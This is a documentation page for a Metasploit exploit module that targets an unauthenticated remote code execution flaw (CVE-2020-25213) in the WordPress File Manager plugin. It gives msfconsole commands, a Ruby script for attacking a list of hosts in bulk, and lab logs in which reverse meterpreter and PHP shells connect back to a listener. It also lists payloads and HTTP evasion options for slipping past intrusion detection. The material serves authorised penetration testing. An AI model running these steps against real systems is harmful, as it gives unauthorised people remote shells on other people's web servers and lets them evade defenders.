WordPress File Manager Unauthenticated Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/multi/http/wp_file_manager_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Options
- Scenarios
- Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using
upload
- Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager,
php/reverse_php
payload, usingupload
- Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using
mkfile+put
- Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager,
php/reverse_php
payload, usingmkfile+put
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: WordPress File Manager Unauthenticated Remote Code Execution
Module: exploit/multi/http/wp_file_manager_rce
Source code: modules/exploits/multi/http/wp_file_manager_rce.rb
Disclosure date: 2020-09-09
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-25213
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
Using wp_file_manager_rce against a single host
Normally, you can use exploit/multi/http/wp_file_manager_rce this way:
msf > use exploit/multi/http/wp_file_manager_rce
msf exploit(wp_file_manager_rce) > show targets
... a list of targets ...
msf exploit(wp_file_manager_rce) > set TARGET target-id
msf exploit(wp_file_manager_rce) > show options
... show and set options ...
msf exploit(wp_file_manager_rce) > exploit
Using wp_file_manager_rce against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your wp_file_manager_rce will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/http/wp_file_manager_rce")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Get a copy of version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.
Vulnerable versions are 6.0-6.8. Versions below 6.0 are not vulnerable and version 6.9 has been patched.
Verification Steps
- Start msfconsole
- Do:
use exploit/multi/http/wp_file_manager_rce
- Do:
set TARGETURI <target_uri>
- Do:
set RHOSTS <target_ip>
- Optional: Do:
set RPORT <target_port>
- Optional: Do:
set PAYLOAD <payload>
to switch payloads - Optional: Do:
set COMMAND <command>
to switch elFinder commands used to exploit vulnerability - Do:
check
to confirm existence of vulnerability orexploit
to let the shells rain
Options
COMMAND
This vulnerability can be exploited in 2 ways:
1. upload
to directly upload a payload
2. mkfile
to create a file, then put
to write arbitrary code to the newly created file
This option has 2 valid values:
1. upload
: exploit using the upload
technique (default)
2. mkfile+put
: exploit using mkfile
and put
Scenarios
Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using upload
msf6 > use exploit/multi/http/wp_file_manager_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800
meterpreter > sysinfo
Computer : 6fc94cd81e93
OS : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >
Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php
payload, using upload
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800
uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using mkfile+put
msf6 > use multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800
meterpreter > sysinfo
Computer : 6fc94cd81e93
OS : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >
Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php
payload, using mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit
[*] Started reverse TCP handler on 192.168.137.128:4444
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800
uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
Go back to menu.
Msfconsole Usage
Here is how the multi/http/wp_file_manager_rce exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > show info
Name: WordPress File Manager Unauthenticated Remote Code Execution
Module: exploit/multi/http/wp_file_manager_rce
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-09-09
Provided by:
Alex Souza (w4fz5uck5)
Imran E. Dawoodjee <[email protected]>
Available targets:
Id Name
-- ----
0 WordPress File Manager 6.0-6.8
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND upload yes elFinder commands used to exploit the vulnerability (Accepted: upload, mkfile+put)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to WordPress installation
VHOST no HTTP server virtual host
Payload information:
Description:
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for
WordPress allows remote attackers to upload and execute arbitrary
PHP code because it renames an unsafe example elFinder connector
file to have the .php extension. This, for example, allows attackers
to run the elFinder upload (or mkfile and put) command to write PHP
code into the wp-content/plugins/wp-file-manager/lib/files/
directory.
References:
https://github.com/w4fz5uck5/wp-file-manager-0day
https://www.tenable.com/cve/CVE-2020-25213
https://nvd.nist.gov/vuln/detail/CVE-2020-25213
Module Options
This is a complete list of options available in the multi/http/wp_file_manager_rce exploit:
msf6 exploit(multi/http/wp_file_manager_rce) > show options
Module options (exploit/multi/http/wp_file_manager_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND upload yes elFinder commands used to exploit the vulnerability (Accepted: upload, mkfile+put)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to WordPress installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress File Manager 6.0-6.8
Advanced Options
Here is a complete list of advanced options supported by the multi/http/wp_file_manager_rce exploit:
msf6 exploit(multi/http/wp_file_manager_rce) > show advanced
Module advanced options (exploit/multi/http/wp_file_manager_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WPCHECK true yes Check if the website is a valid WordPress install
WPCONTENTDIR wp-content yes The name of the wp-content directory
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/wp_file_manager_rce module can exploit:
msf6 exploit(multi/http/wp_file_manager_rce) > show targets
Exploit targets:
Id Name
-- ----
0 WordPress File Manager 6.0-6.8
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/wp_file_manager_rce exploit:
msf6 exploit(multi/http/wp_file_manager_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
4 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
5 payload/php/bind_perl normal No PHP Command Shell, Bind TCP (via Perl)
6 payload/php/bind_perl_ipv6 normal No PHP Command Shell, Bind TCP (via perl) IPv6
7 payload/php/bind_php normal No PHP Command Shell, Bind TCP (via PHP)
8 payload/php/bind_php_ipv6 normal No PHP Command Shell, Bind TCP (via php) IPv6
9 payload/php/download_exec normal No PHP Executable Download and Execute
10 payload/php/exec normal No PHP Execute Command
11 payload/php/meterpreter/bind_tcp normal No PHP Meterpreter, Bind TCP Stager
12 payload/php/meterpreter/bind_tcp_ipv6 normal No PHP Meterpreter, Bind TCP Stager IPv6
13 payload/php/meterpreter/bind_tcp_ipv6_uuid normal No PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
14 payload/php/meterpreter/bind_tcp_uuid normal No PHP Meterpreter, Bind TCP Stager with UUID Support
15 payload/php/meterpreter/reverse_tcp normal No PHP Meterpreter, PHP Reverse TCP Stager
16 payload/php/meterpreter/reverse_tcp_uuid normal No PHP Meterpreter, PHP Reverse TCP Stager
17 payload/php/meterpreter_reverse_tcp normal No PHP Meterpreter, Reverse TCP Inline
18 payload/php/reverse_perl normal No PHP Command, Double Reverse TCP Connection (via Perl)
19 payload/php/reverse_php normal No PHP Command Shell, Reverse TCP (via PHP)
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/wp_file_manager_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/wp_file_manager_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Could not connect
Here is a relevant code snippet related to the "<PEER> - Could not connect" error message:
105: res = send_request_cgi(
106: 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
107: 'method' => 'POST',
108: 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
109: 'data' => post_data.to_s
110: )
111:
112: fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
113: fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
114: end
115: end
<PEER> - Unexpected HTTP response code: <RES.CODE>
Here is a relevant code snippet related to the "<PEER> - Unexpected HTTP response code: <RES.CODE>" error message:
105: res = send_request_cgi(
106: 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
107: 'method' => 'POST',
108: 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
109: 'data' => post_data.to_s
110: )
111:
112: fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
113: fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
114: end
115: end
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- https://github.com/w4fz5uck5/wp-file-manager-0day
- https://www.tenable.com/cve/CVE-2020-25213
- CVE-2020-25213
See Also
Check also the following modules related to this module:
- exploit/multi/http/wp_ait_csv_rce
- exploit/multi/http/wp_catch_themes_demo_import
- exploit/multi/http/wp_crop_rce
- exploit/multi/http/wp_db_backup_rce
- exploit/multi/http/wp_dnd_mul_file_rce
- exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- exploit/multi/http/wp_plugin_backup_guard_rce
- exploit/multi/http/wp_plugin_elementor_auth_upload_rce
- exploit/multi/http/wp_plugin_modern_events_calendar_rce
- exploit/multi/http/wp_plugin_sp_project_document_rce
- exploit/multi/http/wp_popular_posts_rce
- exploit/multi/http/wp_responsive_thumbnail_slider_upload
- exploit/multi/http/wp_simple_file_list_rce
- exploit/multi/php/wp_duplicator_code_inject
- exploit/multi/misc/java_jdwp_debugger
- exploit/multi/http/opmanager_socialit_file_upload
- exploit/multi/http/opmanager_sumpdu_deserialization
- exploit/multi/http/phpfilemanager_rce
- exploit/multi/http/solarwinds_store_manager_auth_filter
- exploit/multi/browser/java_jre17_driver_manager
- exploit/multi/misc/claymore_dual_miner_remote_manager_rce
Related Nessus plugins:
Authors
- Alex Souza (w4fz5uck5)
- Imran E. Dawoodjee <imran [at] threathounds.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
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